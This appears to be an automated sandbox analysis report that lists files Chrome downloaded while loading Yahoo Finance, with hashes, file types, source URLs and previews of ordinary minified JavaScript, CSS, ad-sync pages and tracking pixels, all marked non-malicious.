                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:2779A49A4EE8BFC60B393F211E54A05356AB5FC24B32852BBA9E93D965205B12
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:E469028E330B5B382B7D942007102F397B020A225B56A8E352DF092CF193C742B3780637DE10CDA69D1726E481ED5225B18C9BA55EE9909D14328C4E14E1B7F7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as fe,c as q,b as S,e as D,j as y,d as T,f as I,i as M,q as g,k as b,l as E,u as B,g as j,a as F,Q as ce,p as R,G as ue,a1 as _e,x as de,n as oe,t as Z,h as J,L as w,m as K}from"./scheduler.Dsuh-FKt.js";import{S as me,i as he,t as p,g as O,a as v,e as W,c as U,b as V,m as N,d as A}from"./index.CvwOawEI.js";import{e as X}from"./each.CI2tb2RB.js";import ge from"./ErrorMsg.Cn69Klh6.js";import{L as pe}from"./Link.vSNQugO0.js";import{S as ae}from"./Spinner.D9ew0_W4.js";import{T as we}from"./Tooltip.CzSuDxyY.js";import{g as Me,u as ve,a as Y}from"./GradientScale.DbBrCr3C.js";const ke=o=>({}),$=o=>({});function x(o,n,l){const e=o.slice();e[0]=n[l],e[39]=l;const t=e[0];e[19]=t.key,e[20]=t.width,e[21]=t.height,e[22]=t.mWord,e[23]=t.lWord,e[24]=t.xlWord,e[25]=t.change,e[26]=t.url,e[27]=t.tickerText,e[28]=t.percentChangeText,e[29]=t.coordinates,e[5]=t.i13nModel;const a=e[29];e[30]=a.x,e[31]=a.y;const h=e[20]<8||e[21]<6;e[32]=h;const r=e[20]<8||e[21]<11;e[33]=r;const u=e[20]<8||e[21]<11;e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):86
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.234496061572304
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:yionv//thPlE+tnM7WsrtxBllKxt8SFFFlpimp:6v/lhPfZM1U82FFlpimp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:6C6641B08F4BE6F479F1588AF08054B3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:8DA28B3146834C48FD843B108749191516D2A65D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:C2ECFF291918A3CAF0B7E470323E89F2A1F05B92E12A10649E598CACEBE62ACF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:BE544E3106F2B8E8083EF88B68806D6CEF2C4FBDD416C2E8EE17C88B42337A2972AF2C54CB8287A86ACCF6AC41CBCCA9A2E79F9E44417F5B144681D2B501E235
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://pbs.yahoo.com/setuid?bidder=adobe&gdpr=0&gdpr_consent=&gpp=DBAA&gpp_sid=-1&f=i&uid=ZvreFAAGJeTfkQAF&_test=ZvreFAAGJeTfkQAF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.PNG........IHDR....................sBIT....|.d.....IDAT..c````........N.....IEND.B`.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (47992), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):47992
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.605846858683577
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:768:LuxoaUN4+OIhwP53+e0QfA31jQM9OT81NHv4rnwfe:LuxoaU2+LwB2+G1ZdvCwfe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:CF3402D7483B127DED4069D651EA4A22
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:BDE186152457CACF9C35477B5BDDA5BCB56B1F45
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:EAB5D90A71736F267AF39FDF32CAA8C71673FD06703279B01E0F92B0D7BE0BFC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:9CE42EBC3F672A2AEFC4376F43D38CA9ED9D81AA5B3C1EEF60032BCC98A1C399BE68D71FD1D5F9DE6E98C4CE0B800F6EF1EF5E83D417FBFFA63EEF2408DA55D8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z,V,G,J,$,Q,Y,tt,et,rt,it,nt,ot,st,ct,at,ht,lt,ft,dt,ut,pt,_t,vt,yt,gt,Bt,wt,kt,St,bt=bt||function(l){var t;if("undefined"!=typeof window&&window.crypto&&(t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof t.getRandomValues)try{return t.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof t.randomBytes)try{return t.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")}var r=Object.create||function(t){var e;return n.prototype=t,e=new n,n.prototype=null
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):42
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):2.9881439641616536
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:CUXPQE/xlEy:1QEoy
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:D89746888DA2D9510B64A9F031EAECD5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:D5FCEB6532643D0D84FFE09C40C481ECDF59E15A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:EF1955AE757C8B966C83248350331BD3A30F658CED11F387F8EBF05AB3368629
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:D5DA26B5D496EDB0221DF1A4057A8B0285D15592A8F8DC7016A294DF37ED335F3FDE6A2252962E0DF38B62847F8B771463A0124EF3F84299F262ED9D9D3CEE4C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:GIF89a.............!.......,...........D.;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):145
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.443521092018897
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:J3Tm9YpNNMwIYhzGRyEqa5W9EXeHvjMJNI3vog+oJNI3vomv:3jTJ1ZERWGyTvWXvh
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:0927D595412EAD9D30D2449BE629A52D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:38F505E814041B66E2008FFFED982B777E736776
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:5DC70E266910978DB8D80CA5A612D7770291FE4ACEF40AA863D52CEF6A5DF4A9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:B778E3573113D19A1F38F5A494ED56453B27ACCBEF44DDD38ECE9FC281B6B16032BD4F59F1737244AC0CB26648CD802B42DCB19E63F389ADD6F62870C3156BC0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/assets/Image.BjjiB67D.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:img.yf-13q9uv1{border-radius:var(--border-radius);aspect-ratio:var(--aspect-ratio);-o-object-fit:var(--object-fit);object-fit:var(--object-fit)}.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):150
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.039572593136675
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:HZ8sqDmJS4RKb5ykKcvXjXRHoNcHpWyepGpTuSypKcwH8KFAdSbF3:H69mc4sl3O4pTi3JO
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:B24E5028CE6AA93D50F366887C1BB3AA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:221E24AA9FAA4A7511CBC6EA701DED627E40F88E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:BEAD6056FFC1C60BFA669E524A4B45998A3443192279B1C664FF1C3DF7FB9E8B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:00438EF05FAC3D5349A3CB9017C2877380CA95BBA780BFE23D977FCDFB651BDA8F20048B45357B1978C67915304CCE2A556DE614973FD7E717AC3AE236A39938
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/chevron_left.CltsmSmq.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:const s='<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M15.41 7.41 14 6l-6 6 6 6 1.41-1.41L10.83 12z"/></svg>';export{s as L};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (31010)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):31104
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.274620417309983
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:768:OPfYJnHiAOVGzl8fCN3nULLuZgsucvRyinDOtHYhrh4BEt1:nJ8fU8L9sucvRyinCt4+BEt1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:2EED42C1D760567B6C8CB85EF023D62D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:EBE317FDD0C2040297866E9318FE905496B35C9F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:592D78C718BB5B0240F9217E5C4D7658210EDC758BC3DB17762823A065462B8B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:BD3947F182ED3B8A9C4A918DEF82387EA553016F72DBBB17E0B2A3B09C6CB54427EAAF394D9ECFDA4BAC18B19FCFCB391B803C3A219DC7D8518417DD698222EC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:/*! For license information please see common-bff47d4d.afd9cf2cc048f5011dfe.js.LICENSE.txt */."use strict";(self.webpackChunk_vzmi_finance_cosaic=self.webpackChunk_vzmi_finance_cosaic||[]).push([[194],{1235:(t,e,i)=>{var s=i(4603);i(8978);(t=>{var e=void 0!==s.mE?s.mE:t.CIQ;e.ChartEngine.prototype.pointerEvents={down:[],up:[]},e.ChartEngine.prototype.manageTouchAndMouse=!0,e.ChartEngine.prototype.registerTouchAndMouseEvents=function(){if(!this.touchAndMouseEventsRegistered){this.touchAndMouseEventsRegistered=!0;var t=this.controls.chartControls||document,i=t.querySelector(".stx-zoom-in"),s=t.querySelector(".stx-zoom-out"),n=this.chart.container,a=this,r=function(t,e,i){a.addDomEventListener(n,t,(function(t){a.mainSeriesRenderer.nonInteractive||e(t)}),i)};e.touchDevice?e.isSurface?(r("mousemove",(function(t){a.msMouseMoveProxy(t)})),r("mouseenter",(function(t){a.msMouseMoveProxy(t)})),r("mousedown",(function(t){a.msMouseDownProxy(t)})),r("mouseup",(function(t){a.msMouseUpProxy(t)})),r("
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (1241)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1242
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.337308842516121
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:s6SE1VXqyELfg3jbRVYKRyz/2BvGTNUQCvHA4XY6VlZA5QUhYLvn:z3GyCKjNtq2Bv2Avg4rVlW1uvn
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:373B839459187FF7DB91D2BEE394432C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:D8FDC0679114BF292B6C4CBADCA341515B4F28DD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:148F5023B26DD087663D249106CC373895519637D61B4A6A15022B374FDD5BA0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:2F436F149902B0877358A3EE642B6C49A59560D2F331CA636DCA5F439139FAC70CFCBEA77FCE1AC480542939A346C7381AABE2CC537067D548E8B90694CE96B3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/SectionFooter.xjeo4TXG.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as g,A as m,e as h,d as p,f as v,i as c,q as f,L as _,k as y,_ as u,W as S}from"./scheduler.Dsuh-FKt.js";import{S as k,i as C,c as N,b as q,m as V,t as b,a as w,d as L}from"./index.CvwOawEI.js";import{g as j,a as A}from"./spread.CgU5AtxT.js";import{V as D}from"./ViewMoreLink.Bd590k7x.js";function E(l){let t,a,o,s;const r=[l[2]];let i={};for(let e=0;e<r.length;e+=1)i=m(i,r[e]);return a=new D({props:i}),{c(){t=h("div"),N(a.$$.fragment),this.h()},l(e){t=p(e,"DIV",{class:!0});var n=v(t);q(a.$$.fragment,n),n.forEach(c),this.h()},h(){f(t,"class",o="footer "+l[0]+" yf-1qpyi02"),_(t,"os",l[1])},m(e,n){y(e,t,n),V(a,t,null),s=!0},p(e,[n]){const d=n&4?j(r,[A(e[2])]):{};a.$set(d),(!s||n&1&&o!==(o="footer "+e[0]+" yf-1qpyi02"))&&f(t,"class",o),(!s||n&3)&&_(t,"os",e[1])},i(e){s||(b(a.$$.fragment,e),s=!0)},o(e){w(a.$$.fragment,e),s=!1},d(e){e&&c(t),L(a)}}}function F(l,t,a){const o=["containerClassName","onlySmall"];let s=u(t,o),{containerClassName:r=""}=t,{onlySmall:i=!0}=t;return l.$$set=e=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (15896), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):15896
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.503616373683869
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:384:GGJ01yJn5yOIVmxV/ZUN/4hDEwu85wWoJNmpPvIE:GGJ00JngOCyZ+8l2Wush
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:C73E0CB111244BC0796DA0E83348068B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:C83D2843508D6BA4827C2DCA0670FFBDD4F1E4ED
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:9913C1ABBE147B7CC94C91FBE26B22D24F72B98F4DA5514D376A473B3D10ACD5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:9DF2085B42D146263164156B483EFEBB829DD49434591A2F511A4DE31E69A469DB4612C200382A9CABE10F11A3C5C52EB89AC7590F02149367BB144AC65E6CD9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://ads.pubmatic.com/AdServer/js/user_sync.html?kdntuid=1&p=133799&gdpr=0&gdpr_consent=&us_privacy=1YNN&gpp=DBAA&gpp_sid=-1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:<html><body><script type="text/javascript">(function(){var aa=window,p=navigator,ai=aa.top||aa,aj=aa.location.search.substr(1),A=encodeURIComponent,W=decodeURIComponent,aA=aa.parseInt,P=aa.PubMatic||(aa.PubMatic={}),K=0,ad=0,b=0,ao="pubmatic.com",V="ads."+ao,al=1,Q="https://",a=(aa.__cmp?1:0),an=function(aF){return typeof aF==="function"},au=console.log.bind(console,"PubMatic:"),at=function(aJ,aI){var aG=0,aF=aJ.length,aH=false;for(;aG<aF;aG++){if(aJ[aG]===aI){aH=true;break}}return aH},n=function(aF,aI){var aH=aa.document.createElement("script");aH.type="text/javascript";aH.src=aF;aH.async=true;if(an(aI)){aH.onload=aH.onreadystatechange=aI}var aG=aa.document.getElementsByTagName("script")[0];aG&&aG.parentNode&&an(aG.parentNode.appendChild)&&aG.parentNode.appendChild(aH)},aq=function(aH){var aG=aa.document.createElement("iframe");aG.src=aH;aG.style.height="0px";aG.style.width="0px";aG.style.display="none";aG.height=0;aG.width=0;aG.border="0px";aG.hspace="0";aG.vspace="0";aG.marginWidth=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PNG image data, 240 x 34, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):2331
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.732123200569469
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:HCPVHbdLb/levTWdqgmGYDQpuYpdKqLxoh5F:HCNHxL4O0QpXKqOt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:D0E45188F6A8F2E8F2528E762FE55D33
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:42A007181ABDADCC4C79D03D74B08F39DDDC5127
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:DEB2DC4C95EA5B692229713672E7AEAE32B3914BAFCD63F926116D6637BD1976
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:0FD2F174A63472217D8BC23DE69DCBCAA1A583DED45152430D1A5BA455F6B1F360815DB34B5C8F96DA7DAAE232DB52197775F7F50955F497D6B664EB93B58800
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/cv/apiv2/yahoo_weather_web/accuweather-horizontal.png
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.PNG........IHDR.......".....V}.....{PLTE............................................................................................................................x.....(tRNS....!.k6...L........)....Y..D..q>.wdS_._.D...'IDATh..Y.0.M............!.^..z.....&.d.......,...@.....m.&x..l....M.-.k4....kZa.........Y..F....=I..jx.C..H..W......e....o.oO.|..D..?#.D.{~..own*...S.........7..K.....<...nA..~.8."q.@....C2...j...>..t}....(..M..@^....a..x..~J8.n{.G..b$..m_%.Y.........X.X)..Y.b.qk..].....`z...1=...vu..dj..7c').h....L..0.+e*BC...S.....jyzb.\.........3G1K..`..{Kl..{_%....F.....g....h.)n..F...-&...K....)6...hV.e.#3.N..O,.....~'..s....SZ..!.).0..u.....v.1.....<...F...O.O...@....Bk.j.8[.D.4Y.5...h.-..:dAIzn.)>...\..1.....s.#[.{.....}.+.3....T.w..F.#.aaa.....7.5..QR...Q*....].#..n....R..`,q...n..B:..4...=.w.../..fNN...<.P..j.U...D...c.T.(.R.X8..~el..>.h.]]5\....6.-...9#.$.:..a6..1.U..`L.4.%...v....+D.eN.znm....v...H..T....o...;)X.\..0...x..5}B..*.Q.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (814)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):815
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.175079001514799
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:irHv7SvxwVMPeE2bJdgKLZIuxS2sT1bakGqrtgeGo9ZsV:ibvegBda6yBmeV8V
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:93AA719022B67645D571174D77D7E316
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:FF6CEB501CAD81712FB5AEF8EF5CD12F0248D791
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:7FD6082CFF9CDCD95D88BB38AB952B1B66CFC392E2EFF188C7AB19398BC64E51
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:63BF579C982352F182EFEA6010BA333DF5816CA3029BFD601920706F80A558CCBC9C86B855E55D1F4F96C9281780D0BE6C6E3F0D2F0A5D6AF050451F1CE48C89
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{c as d,d as p}from"./commonUtil.BWwawKjd.js";import{f as m,l as w}from"./logUtil.CCV3qKPL.js";async function v(r,{path:n,reuse:f=!0,silent:g=!1}={}){var c,t;const[o]=await d(["experience"],r),a=await p(r);if(f){const e=o.getRegionData("dock");if(e)return e}try{const e=a.ynet==="1",l=(((c=r.url)==null?void 0:c.searchParams)||new URL(window.location.href).searchParams).get("expPreview"),u={product:"financeWeb",lang:a.lang,region:a.region,...n&&{path:n},...e&&l&&{preview:l}},s=await m(r,{isRelative:!0,pathname:"/xhr/experience",perfLabel:"loadPreferences",query:u},{credentials:"include"}),i=(t=s==null?void 0:s.container)==null?void 0:t.regions;return!g&&i&&o.loadExperience(i),i}catch(e){if(n&&n==="subscription-pricing")throw e;return w(r,{},{data:e,perfLabel:"loadPreferences"}),null}}export{v as l};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):19168
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.910029242146149
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:384:+5F6D10D5uDD9QyhFADDqOqDdApkDV4Ptv14tDpiDFV0DxRt4MqDx1qCkDBN9A0N:+5Fe105w9JhFKqOudA+Vyh14VpGFmx35
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:67DDBCF3ADB78F6B680F80564CA544FB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:16C13C4A1B36ECB8BEDC29C27701C6D7619329A2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:D159EC6C311C7058174F59C285532348DABF14B6E323BA519848AE2262C89E03
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:EFBB7D1BC76B8A56405C287A645003CC22B048D22D16415A9F2C7BDCFB164E290FD80ED766FF8A9E19E0A5443B46A9539757AD9DADFD0258938166A55761408A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://cdn.taboola.com/static/impl/css/GTAmerica_2024-03-27.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:@font-face {. font-family: 'GT America Condensed';. src: url('//cdn.taboola.com/static/impl/eot/GTAmerica-CondensedBlack.eot');. src: local('GT America Condensed Black'), local('GTAmerica-CondensedBlack'),. url('//cdn.taboola.com/static/impl/eot/GTAmerica-CondensedBlack.eot?#iefix') format('embedded-opentype'),. url('//cdn.taboola.com/static/impl/woff2/GTAmerica-CondensedBlack.woff2') format('woff2'),. url('//cdn.taboola.com/static/impl/woff/GTAmerica-CondensedBlack.woff') format('woff'),. url('//cdn.taboola.com/static/impl/ttf/GTAmerica-CondensedBlack.ttf') format('truetype');. font-weight: 900;. font-style: normal;. font-display: swap;.}..@font-face {. font-family: 'GT America Condensed';. src: url('//cdn.taboola.com/static/impl/eot/GTAmerica-CondensedBlackItalic.eot');. src: local('GT America Condensed Black Italic'), local('GTAmerica-CondensedBlackItalic'),. url('//cdn.taboola.com/static/impl/eot/GTAmerica-CondensedBlack
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (55201), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):55201
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.402742992612217
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:1536:Xr4MuUUXPgSKUUJcConr/m8b6442RZTeKc8o:7cX6Uvw2RZTeDT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:1373A6D9D7D4C547326572BF62610656
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:4D55756AB17C6DB24AC089687DF5F4F5668F8721
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:5A342906865F8FEEE1DFDD0132EE45310D87E4138661797F20CAAE3C049370E9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:47D602F1F860A672ACB0D76EC1D102D75FE5AA89C5599CC6BD69CF3BD4F2C804ED5CC75CF59C538BFCC84D40DD937C51161CF771B75A67949849D278BA4D4FB1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:/*! JAC 2.0.0, Copyright 2018-2023 Yahoo Inc. */(()=>{"use strict";const e=class{constructor(e,t={}){this.type=e,this.meta=t,this.target=null}};class t extends e{static SCROLL="page.scroll";static RESIZE="page.resize";static VISIBILITY="page.visibility";static FOCUS="window.focus";static BLUR="window.blur";static FOCUS_IN="window.focus_in";static BLUR_CAPTURE="window.blur_capture";static DOM_LOADED="dom.loaded";static LOADED="page.loaded";static BEFORE_UNLOAD="page.stopped";static MOUSE_OVER="page.mouse_over";static MOUSE_OUT="page.mouse_out"}const i={addDOMLoadListener:function(e){if("loading"!==document.readyState)return e();document.addEventListener("DOMContentLoaded",e,!1)},addPageLoadListener:function(e){if("complete"===document.readyState)return e();window.addEventListener("load",e,!1)}};function s(e,t,i=this){let s=null,n=null;const o=()=>{e.apply(i,n),s=null};return(...e)=>{s||(n=e,s=setTimeout(o,t))}}function n(e,t){if(Array.isArray(t)){if(t.includes(e))return!0}else for(let i
